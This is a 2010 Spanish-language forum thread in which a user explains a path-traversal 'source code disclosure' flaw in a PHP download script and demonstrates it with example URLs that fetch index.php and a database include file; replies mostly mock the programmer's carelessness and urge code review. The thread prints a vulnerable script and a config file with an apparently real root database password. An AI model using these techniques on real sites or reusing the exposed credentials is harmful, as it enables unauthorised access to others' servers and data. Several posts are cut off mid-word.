Autor Tema: [S.C.D] Source Code Disclosure - Tutorial  (Leído 548 veces)

SrXaoc

  • Mensajes: 6
    • Ver Perfil
[S.C.D] Source Code Disclosure - Tutorial
« : junio 23, 2010, 11:31:39 pm »
Esta vulnerabilidad se da en la funcion de descarga de archivo locales, un ejemplo claro seria:

Código: [Seleccionar]
<?php
//Disposition fix by Wim Vandersmissen

$archivo $_GET['file'];

if (
strstr($HTTP_USER_AGENT"MSIE")){
$attachment "";
}else{
$attachment " attachment;";
}

$filesize filesize($archivo);
if(
$filesize) {
Header("Content-Type: application/x-ms-download");
Header("Content-Length: ".$filesize);
Header("Content-Disposition: attachment; filename=".$archivo);
@readfile($archivo);
exit;
}
?>


En si funcionaria asi:

Cita
http://www.web.com/download.php?archivo=/docs/archivo.pdf

Como podemos ver este script permite descargar archivos del servidor, pero como podriamos utilizar esto a nuestro favor ???
Lo que aremos es buscar el archivo que alverga la informacion de la BD, entonces me descargo el index.php, aver que encuentro:

Me dirijo a :

Cita
http://www.web.com/download.php?archivo=index.php

Inmediatamente me descargo el index, buscando me encuentro con esta linea de codigo, muy interesante:

Código: [Seleccionar]
require_once('/intranet/librerias/db_mysql.inc.php');

Entonces me dirijo a descargar esa libreria aver que encuentro, voy a:

Cita
http://www.web.com/download.php?archivo=/intranet/librerias/db_mysql.inc.php

Y  :o nada mas ni nada menos la informacion de la BD:
Código: [Seleccionar]
<?php
  $dbusuario
='root';
  
$dbclave='Ccibague2010';
  
$dbnombre='servidor_ccibague';
    
  if (!
mysql_connect("localhost","$dbusuario","$dbclave")) 
  { 
   echo 
"Error, No conecto a la base de datos.";
   exit(); 
  } 
  if (!
mysql_select_db("$dbnombre")) 
  { 
   echo 
"Error, No selecciono la base de datos."
   exit(); 
  } 
?>


Solo faltar
« Última Modificación: junio 27, 2010, 09:15:32 pm por E=mc »

Phicar

  • :P
  • Administrador
  • Mensajes: 283
  • (1+sqrt(5))/2
    • MSN Messenger - diego_villahacker@hotmail.com
    • Ver Perfil
    • Phicar's Blog
    • Email
Re: [S.C.D] Source Code Disclosure - Tutorial
« Respuesta #1 : junio 24, 2010, 04:02:44 pm »
Por que es una vulnerabilidad? en vez de estupidez de el programador?
:)

my.opera.com/phicar

[D-m-K]

  • Administrador
  • Mensajes: 229
  • [-.|.-]
    • MSN Messenger - d4rk.m0nk3y@hotmail.com
    • Ver Perfil
    • Red Informatica Colombiana
    • Email
Re: [S.C.D] Source Code Disclosure - Tutorial
« Respuesta #2 : junio 24, 2010, 04:05:26 pm »
jejejeje que curioso ese m
:: Todas las grandes cosas que se disfrutan son el producto de las pequeñas cosas que se logran ::

[D-m-K]

  • Administrador
  • Mensajes: 229
  • [-.|.-]
    • MSN Messenger - d4rk.m0nk3y@hotmail.com
    • Ver Perfil
    • Red Informatica Colombiana
    • Email
Re: [S.C.D] Source Code Disclosure - Tutorial
« Respuesta #3 : junio 24, 2010, 04:07:42 pm »
jejejeje phicar tienes raz
:: Todas las grandes cosas que se disfrutan son el producto de las pequeñas cosas que se logran ::

ChechoHack

  • Moderador
  • Mensajes: 115
    • MSN Messenger - sergioariza@informaticos.com
    • Ver Perfil
    • HackBeerWii Event
    • Email
Re: [S.C.D] Source Code Disclosure - Tutorial
« Respuesta #4 : junio 24, 2010, 10:15:17 pm »
Juax !! Parceros que pena tenerlos tan olvidados !!  :P pero igual aca vuelvo (Checho Recargado) xD tiras :P

Bueno el bug la verdad es algo pendejo, como dice don DmK muy salado el q tenga ese code  ;D aunq igual puede q le pase a uno tambn jeje uno es muy despreocupado por el code, al menos a la hora de montar un CMS xD por eso es bueno despues de montarlo echarle una ojeadita al code y de vez en cuando realizar una q otra pruebita de pentest ;D jugar un ratico :P

Ta buena la info esto ayudara a ser un poco mas perspicaz a la hora de montar un cms o a la hora de programar y a preocuparse algo mas por la seguridad ;D


Parcero gusto en saludarlos y estamos charlando !! :P

« Última Modificación: junio 24, 2010, 10:17:51 pm por ChechoHack »

Clerigo

  • Administrador
  • Mensajes: 154
  • Jr. Programmer
    • Ver Perfil
Re: [S.C.D] Source Code Disclosure - Tutorial
« Respuesta #5 : junio 24, 2010, 11:28:24 pm »
No puede ser......... de donde saco SrXaoc el c
« Última Modificación: junio 24, 2010, 11:30:16 pm por Clerigo »

Phicar

  • :P
  • Administrador
  • Mensajes: 283
  • (1+sqrt(5))/2
    • MSN Messenger - diego_villahacker@hotmail.com
    • Ver Perfil
    • Phicar's Blog
    • Email
Re: [S.C.D] Source Code Disclosure - Tutorial
« Respuesta #6 : junio 25, 2010, 04:07:10 pm »
Si es que a veces soy medio seco xDDD..pero la verdad es que si es pura ingenuidad.. :)
:)

my.opera.com/phicar

SrXaoc

  • Mensajes: 6
    • Ver Perfil
Re: [S.C.D] Source Code Disclosure - Tutorial
« Respuesta #7 : junio 26, 2010, 05:03:06 pm »
Primero que todo, gracias por las respuestas, primer post y veo que tiene buena acogida y aunque no la crean gran cantidad de webs tienen este gran error del programador.

Cita
Pdta2:

Str4ng3letS

  • E=mc²
  • Administrador
  • Mensajes: 344
  • S-Lozano
    • MSN Messenger - stynky_xp4rky3x@hotmail.com
    • Ver Perfil
    • F1s1c0-H4ck3r
Re: [S.C.D] Source Code Disclosure - Tutorial
« Respuesta #8 : junio 27, 2010, 09:15:14 pm »
Bueno, otro error de programacion y mas que de programacion del programador.

Si se logra sacar lo de la base de datos, en caso de que sea un CMS, la contrase